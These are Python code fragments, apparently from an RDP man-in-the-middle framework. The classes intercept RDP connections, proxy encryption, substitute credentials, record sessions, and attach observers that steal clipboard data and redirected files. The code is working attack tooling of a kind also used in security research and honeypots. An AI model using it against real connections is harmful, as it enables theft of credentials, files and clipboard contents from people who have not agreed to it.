def buildDeviceRedirectionChannel(self, mcs: MCSLayer, userID: int,
channelID: int) -> MCSServerChannel:
"""
:type mcs: MCSLayer
:param userID: The mcs user that builds the channel
:param channelID: The channel ID to use to communicate in that channel
:return: MCSServerChannel that handles the device redirection virtual channel traffic from
the client to the MITM.
"""
# Create all necessary layers
channel = MCSServerChannel(mcs, userID, channelID)
securityLayer = self.createSecurityLayer()
virtualChannelLayer = VirtualChannelLayer(
activateShowProtocolFlag=False)
deviceRedirectionLayer = DeviceRedirectionLayer()
Layer.chain(channel, securityLayer, virtualChannelLayer,
deviceRedirectionLayer)
# Create and link the MITM Observer for the server side to the device redirection layer.
# Also link both MITM Observers (client and server) so they can send traffic the other way.
peer = self.client.getChannelObserver(channelID)
observer = PassiveFileStealerServer(
deviceRedirectionLayer, self.recorder,
self.client.deviceRedirectionObserver, self.log)
observer.setPeer(peer)
deviceRedirectionLayer.addObserver(observer)
return channel
def buildDeviceRedirectionChannel(self, mcs: MCSLayer, userID: int,
channelID: int) -> MCSClientChannel:
"""
:param mcs: The MCS Layer to transport traffic
:param userID: The mcs user that builds the channel
:param channelID: The channel ID to use to communicate in that channel
:return: MCSClientChannel that handles the Device redirection virtual channel traffic from the server to the MITM.
"""
# Create all necessary layers
channel = MCSClientChannel(mcs, userID, channelID)
securityLayer = self.createSecurityLayer()
virtualChannelLayer = VirtualChannelLayer(
activateShowProtocolFlag=False)
deviceRedirectionLayer = DeviceRedirectionLayer()
Layer.chain(channel, securityLayer, virtualChannelLayer,
deviceRedirectionLayer)
# Create and link the MITM Observer for the client side to the device redirection layer.
self.deviceRedirectionObserver = PassiveFileStealerClient(
deviceRedirectionLayer, self.recorder, self.log)
deviceRedirectionLayer.addObserver(self.deviceRedirectionObserver)
self.channelObservers[channelID] = self.deviceRedirectionObserver
return channel
def buildClipboardChannel(self, mcs: MCSLayer, userID: int,
channelID: int) -> MCSServerChannel:
"""
:type mcs: MCSLayer
:param userID: The mcs user that builds the channel
:param channelID: The channel ID to use to communicate in that channel
:return: MCSServerChannel that handles the Clipboard virtual channel traffic from the client to the MITM.
"""
# Create all necessary layers
channel = MCSServerChannel(mcs, userID, channelID)
securityLayer = self.createSecurityLayer()
virtualChannelLayer = VirtualChannelLayer()
clipboardLayer = ClipboardLayer()
Layer.chain(channel, securityLayer, virtualChannelLayer,
clipboardLayer)
# Create and link the MITM Observer for the server side to the clipboard layer.
# Also link both MITM Observers (client and server) so they can send traffic the other way.
peer = self.client.getChannelObserver(channelID)
passiveClipboardObserver = PassiveClipboardStealer(
clipboardLayer, self.recorder, self.log)
peer.passiveClipboardObserver = passiveClipboardObserver
passiveClipboardObserver.setPeer(peer)
clipboardLayer.addObserver(passiveClipboardObserver)
return channel
def buildClipboardChannel(self, mcs: MCSLayer, userID: int,
channelID: int) -> MCSClientChannel:
"""
:param mcs: The MCS Layer to transport traffic
:param userID: The mcs user that builds the channel
:param channelID: The channel ID to use to communicate in that channel
:return: MCSClientChannel that handles the Clipboard virtual channel traffic from the server to the MITM.
"""
# Create all necessary layers
channel = MCSClientChannel(mcs, userID, channelID)
securityLayer = self.createSecurityLayer()
virtualChannelLayer = VirtualChannelLayer()
clipboardLayer = ClipboardLayer()
Layer.chain(channel, securityLayer, virtualChannelLayer,
clipboardLayer)
# Create and link the MITM Observer for the client side to the clipboard layer.
activeClipboardObserver = ActiveClipboardStealer(
clipboardLayer, self.recorder, self.log)
clipboardLayer.addObserver(activeClipboardObserver)
self.channelObservers[channelID] = activeClipboardObserver
return channel
def __init__(self):
RDPConnectionTab.__init__(self, QRemoteDesktop(1024, 768))
self.tcp = AsyncIOTCPLayer()
self.tpkt = TPKTLayer()
self.message = PlayerMessageLayer()
self.eventHandler = PlayerMessageHandler(self.widget, self.text)
Layer.chain(self.tcp, self.tpkt, self.message)
self.message.addObserver(self.eventHandler)
def __init__(self, reactor: Reactor, log: logging.Logger):
self.reactor = reactor
self.log = log
self.tcp = TCPCertFetchingLayer()
self.tpkt = TPKTLayer()
self.x224 = X224Layer()
Layer.chain(self.tcp, self.tpkt, self.x224)
self.tcp.createObserver(onConnection=self.sendConnectionRequest)
self.x224.createObserver(onConnectionConfirm=lambda _: self.startTLS())
def buildVirtualChannel(self, mcs, userID, channelID) -> MCSClientChannel:
channel = MCSClientChannel(mcs, userID, channelID)
securityLayer = self.createSecurityLayer()
rawLayer = RawLayer()
Layer.chain(channel, securityLayer, rawLayer)
observer = MITMVirtualChannelObserver(rawLayer)
rawLayer.addObserver(observer)
self.channelObservers[channelID] = observer
return channel
def buildVirtualChannel(self, mcs: MCSLayer, userID: int,
channelID: int) -> MCSServerChannel:
channel = MCSServerChannel(mcs, userID, channelID)
securityLayer = self.createSecurityLayer()
rawLayer = RawLayer()
Layer.chain(channel, securityLayer, rawLayer)
peer = self.client.getChannelObserver(channelID)
observer = MITMVirtualChannelObserver(rawLayer)
observer.setPeer(peer)
rawLayer.addObserver(observer)
return channel
def buildIOChannel(self, mcs: MCSLayer, userID: int,
channelID: int) -> MCSServerChannel:
encryptionMethod = self.serverData.security.encryptionMethod
self.securityLayer = self.createSecurityLayer()
self.securityLayer.createObserver(
onClientInfoReceived=self.onClientInfoReceived,
onSecurityExchangeReceived=self.onSecurityExchangeReceived,
onLicensingDataReceived=self.onLicensingDataReceived)
slowPathObserver = MITMSlowPathObserver(
self.log, self.slowPathLayer, onConfirmActive=self.onConfirmActive)
slowPathObserver.setDataHandler(SlowPathDataType.PDUTYPE2_INPUT,
self.onInputPDUReceived)
clientObserver = self.client.getChannelObserver(channelID)
slowPathObserver.setPeer(clientObserver)
self.slowPathLayer.addObserver(slowPathObserver)
self.slowPathLayer.addObserver(RecordingSlowPathObserver(
self.recorder))
fastPathParser = createFastPathParser(self.useTLS, encryptionMethod,
self.crypter, ParserMode.SERVER)
self.fastPathLayer = FastPathLayer(fastPathParser)
fastPathObserver = MITMFastPathObserver(self.log, self.fastPathLayer)
fastPathObserver.setPeer(self.client.getFastPathObserver())
self.fastPathLayer.addObserver(fastPathObserver)
self.fastPathLayer.addObserver(
RecordingFastPathObserver(self.recorder,
PlayerMessageType.FAST_PATH_INPUT))
channel = MCSServerChannel(mcs, userID, channelID)
Layer.chain(channel, self.securityLayer, self.slowPathLayer)
self.segmentation.attachLayer(SegmentationPDUType.FAST_PATH,
self.fastPathLayer)
if self.useTLS:
self.securityLayer.securityHeaderExpected = True
return channel
def buildIOChannel(self, mcs: MCSLayer, userID: int,
channelID: int) -> MCSClientChannel:
encryptionMethod = self.serverData.security.encryptionMethod
self.securityLayer = self.createSecurityLayer()
self.securityLayer.createObserver(
onLicensingDataReceived=self.onLicensingDataReceived)
slowPathObserver = MITMSlowPathObserver(self.log, self.slowPathLayer)
self.slowPathLayer.addObserver(slowPathObserver)
self.slowPathLayer.addObserver(RecordingSlowPathObserver(
self.recorder))
self.channelObservers[channelID] = slowPathObserver
fastPathParser = createFastPathParser(self.useTLS, encryptionMethod,
self.crypter, ParserMode.CLIENT)
self.fastPathLayer = FastPathLayer(fastPathParser)
self.fastPathObserver = MITMFastPathObserver(self.log,
self.fastPathLayer)
self.fastPathLayer.addObserver(self.fastPathObserver)
self.fastPathLayer.addObserver(
RecordingFastPathObserver(self.recorder,
PlayerMessageType.FAST_PATH_OUTPUT))
channel = MCSClientChannel(mcs, userID, channelID)
Layer.chain(channel, self.securityLayer, self.slowPathLayer)
self.segmentation.attachLayer(SegmentationPDUType.FAST_PATH,
self.fastPathLayer)
if self.useTLS:
self.securityLayer.securityHeaderExpected = True
elif encryptionMethod != 0:
self.log.debug("Sending Security Exchange")
self.slowPathLayer.previous.sendSecurityExchange(
self.securitySettings.encryptClientRandom())
return channel
def __init__(self, friendlyName: str, targetHost: str, targetPort: int,
certificateFileName: str, privateKeyFileName: str,
recordHost: str, recordPort: int, replacementUsername: str,
replacementPassword: str):
MCSUserObserver.__init__(self)
self.sessionId = f"{friendlyName}{random.randrange(100000,999999)}"
self.log = getLoggerPassFilters(
f"{LOGGER_NAMES.MITM_CONNECTIONS}.{self.sessionId}.server")
self.metadataFilter = ConnectionMetadataFilter(self, self.sessionId)
self.log.addFilter(self.metadataFilter)
self.replacementPassword = replacementPassword
self.replacementUsername = replacementUsername
self.targetHost = targetHost
self.targetPort = targetPort
self.certificateFileName = certificateFileName
self.privateKeyFileName = privateKeyFileName
self.clipboardObserver = None
self.useTLS = False
self.client: MITMClient = None
self.clientConnector = None
self.originalNegotiationPDU = None
self.targetNegotiationPDU = None
self.serverData = None
self.rc4RSAKey = RSA.generate(2048)
self.crypter = RC4CrypterProxy()
self.socket = None
self.fileHandle = open(
"out/rdp_replay_{}_{}.pyrdp".format(
datetime.datetime.now().strftime('%Y%m%d_%H-%M-%S'),
random.randint(0, 1000)), "wb")
rc4Log = getLoggerPassFilters(f"{self.log.name}.rc4")
self.securitySettings = SecuritySettings(SecuritySettings.Mode.SERVER)
self.securitySettings.addObserver(self.crypter)
self.securitySettings.addObserver(RC4LoggingObserver(rc4Log))
self.tcp = TwistedTCPLayer()
self.tcp.createObserver(onConnection=self.onConnection,
onDisconnection=self.onDisconnection)
self.segmentation = SegmentationLayer()
self.segmentation.createObserver(
onUnknownHeader=self.onUnknownTPKTHeader)
self.tpkt = TPKTLayer()
self.x224 = X224Layer()
self.x224.createObserver(onConnectionRequest=self.onConnectionRequest,
onDisconnectRequest=self.onDisconnectRequest)
self.mcs = MCSLayer()
self.router = MITMServerRouter(self.mcs, self)
self.mcs.addObserver(self.router)
self.router.createObserver(
onConnectionReceived=self.onConnectInitial,
onDisconnectProviderUltimatum=self.onDisconnectProviderUltimatum,
onAttachUserRequest=self.onAttachUserRequest,
onChannelJoinRequest=self.onChannelJoinRequest)
self.gcc = GCCParser()
self.rdpClientInfoParser = ClientInfoParser()
self.rdpClientConnectionParser = ClientConnectionParser()
self.rdpServerConnectionParser = ServerConnectionParser()
self.securityLayer = None
self.slowPathLayer = SlowPathLayer()
self.fastPathLayer = None
self.tcp.setNext(self.segmentation)
self.segmentation.attachLayer(SegmentationPDUType.TPKT, self.tpkt)
Layer.chain(self.tpkt, self.x224, self.mcs)
if recordHost is not None and recordPort is not None:
self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
self.socket.connect((recordHost, recordPort))
except socket.error as e:
logging.getLogger(LOGGER_NAMES.MITM).error(
"Could not connect to liveplayer: %(error)s", {"error": e})
self.socket.close()
self.socket = None
recordingLayers = [FileLayer(self.fileHandle)]
if self.socket is not None:
recordingLayers.append(SocketLayer(self.socket))
# Since we're intercepting communications from the original client (so we're a server),
# We need to write back the packets as if they came from the client.
self.recorder = Recorder(recordingLayers)
def __init__(self,
server,
fileHandle: BinaryIO,
livePlayerSocket: socket,
replacementUsername=None,
replacementPassword=None):
MCSChannelFactory.__init__(self)
self.log = getLoggerPassFilters(
f"{LOGGER_NAMES.MITM_CONNECTIONS}.{server.getSessionId()}.client")
self.log.addFilter(server.metadataFilter)
self.replacementUsername = replacementUsername
self.replacementPassword = replacementPassword
self.server = server
self.channelMap: Dict[int, str] = {}
self.channelDefinitions = []
self.channelObservers = {}
self.deviceRedirectionObserver = None
self.useTLS = False
self.user = None
self.fastPathObserver = None
self.conferenceCreateResponse = None
self.serverData = None
self.crypter = RC4CrypterProxy()
rc4Log = getLoggerPassFilters(f"{self.log.name}.rc4")
self.securitySettings = SecuritySettings(SecuritySettings.Mode.CLIENT)
self.securitySettings.addObserver(self.crypter)
self.securitySettings.addObserver(RC4LoggingObserver(rc4Log))
self.tcp = TwistedTCPLayer()
self.tcp.createObserver(onConnection=self.startConnection,
onDisconnection=self.onDisconnection)
self.segmentation = SegmentationLayer()
self.segmentation.createObserver(
onUnknownHeader=self.onUnknownTPKTHeader)
self.tpkt = TPKTLayer()
self.x224 = X224Layer()
self.x224.createObserver(onConnectionConfirm=self.onConnectionConfirm,
onDisconnectRequest=self.onDisconnectRequest)
self.mcs = MCSLayer()
self.router = MCSClientRouter(self.mcs, self)
self.mcs.addObserver(self.router)
self.router.createObserver(
onConnectResponse=self.onConnectResponse,
onDisconnectProviderUltimatum=self.onDisconnectProviderUltimatum)
self.mcsConnect = MCSClientConnectionLayer(self.mcs)
self.gccConnect = GCCClientConnectionLayer(b"1")
self.gccConnect.createObserver(
onPDUReceived=self.onConferenceCreateResponse)
self.rdpConnect = ClientConnectionLayer()
self.rdpConnect.createObserver(onPDUReceived=self.onServerData)
self.securityLayer = None
self.slowPathLayer = SlowPathLayer()
self.fastPathLayer = None
self.tcp.setNext(self.segmentation)
self.segmentation.attachLayer(SegmentationPDUType.TPKT, self.tpkt)
Layer.chain(self.tpkt, self.x224, self.mcs)
Layer.chain(self.mcsConnect, self.gccConnect, self.rdpConnect)
record_layers = [FileLayer(fileHandle)]
if livePlayerSocket is not None:
record_layers.append(SocketLayer(livePlayerSocket))
self.recorder = Recorder(record_layers)
def addTransportLayer(self, transportLayer: Layer):
tpktLayer = TPKTLayer()
messageLayer = PlayerMessageLayer()
Layer.chain(transportLayer, tpktLayer, messageLayer)
self.topLayers.append(messageLayer)